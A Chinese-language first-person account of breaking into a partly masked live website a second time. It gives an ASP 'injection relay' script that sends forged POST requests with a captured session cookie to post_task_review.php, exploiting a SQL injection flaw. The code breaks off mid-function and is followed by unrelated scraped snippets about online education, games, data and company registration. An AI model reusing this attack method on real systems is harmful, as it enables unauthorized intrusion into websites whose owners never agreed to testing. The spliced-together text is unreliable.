在这次入侵之前我已经拿到过一次这个网站的shell了,但是被删除了,由于不甘心又拿了一次,才有了下面的过程
一: 踩点 收集信息
因为这个已经是第二次入侵,所以具体的信息我已经基本上掌握
服务器上13个站点,大多数站点很安全,因为之一渗透的时候,是由
http://www.shanXXX.XX 这个站进入的
我这个人比较恋旧,所以第二次也决定由这个站点进行入侵,
由后台看出这个站的程序是RAICO_V1[1].2_CS 如图1
直接从网上down下来,读代码,当然这里的php代码 本人是非常的菜鸟,感谢我的好友jackal,他的脚本是相当的强悍,呵呵
二: 漏洞在哪里?它在灯火阑珊处
这个程序的漏洞文件是在post_task_review.php
由于过滤不严格导致注入,下面我会在文章中详细说明如何利用,
首先在shan这个站注册个用户 并抓取登陆的cookie值,在到本地或者webshell上建立一个注入中转站的文件
内容如下
http://www.shanXXX.XX/post_task_review.php
JmRef=http://www.shanXXX.XX/post_task.php
JmCok=__utma=213560918.3117244849183171600.1213283730.1213293786.1213305387.4; __utmz=213560918.1213283730.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmb=213560918.21.10.1213305387; __utmc=213560918; PHPSESSID=96b20d4edfe8477cf276aa639bfc31d3
JmStr=URLEncoding(JmStr)
response.write PostData(JMUrl,JmStr,JmCok,JmRef)
Function PostData(PostUrl,PostStr,PostCok,PostRef)
Dim Http
Set Http = Server.CreateObject(msxml2.serverXMLHTTP)
With Http
.Open POST,PostUrl,False
.SetRequestHeader Content-Length,Len(PostStr)
.SetRequestHeader Content-Type,application/x-www-form-urlencoded
.SetRequestHeader Referer,PostRef
.SetRequestHeader Cookie,PostCok
由于疫情的原因,各人大多断绝在家没什么事可做,导致线下教诲机构需求萎缩,而K12线上教诲行业迎来了新的一波机会,像猿向导、学而思、瓜瓜龙等线上的项目都火了。因此,运营人如何转型K12线上教诲,做好线上...
wow埃匹希斯圣物(埃匹希斯圣物) 大伙儿一定了解埃皮法斯的情况:以前光辉的古文明,凭着埃皮法斯紫水晶的超自然力量和强劲的光线武器装备,在一瞬间消退在历史时间的江河中,只留有持续挖掘的珍贵文物和传说...
在举办数据事情之前,相识基本的观念和信息是必需的。本文作者从数据是什么出发,对数据的差异观念及其代价举办梳理阐明,与各人分享。 首先,此刻各个公司人人都讲大数据,可是最顶层的数据的认知应用才是制胜千...
为什么一般ATM机上的键盘都是金属的?想必很多朋友都想知道支付宝蚂蚁庄园今日课堂答题是什么,今天小编为大家分享2020年7月1日支付宝蚂蚁庄园今日答题答案吧! 支付宝蚂蚁庄园今日课堂答题7月1...
弈天建网8年了,2001年建起的。最厉害的高手一般经常在华山对弈或看棋。求采纳 至尊擂台-30+卫冕分,2600+等级分-无极擂台^天帝擂台-20+卫冕分,2500+等级分-天罡擂台^日帅擂台-10...
很多创业者在注册公司时都会有一个疑惑,那就是公司注册到底需要多长时间呢?下面小编就带大家一起来了解一下吧。 正常注册公司办理需要的时间: 1、名称预先登记 1个工作日 2、做工商材料...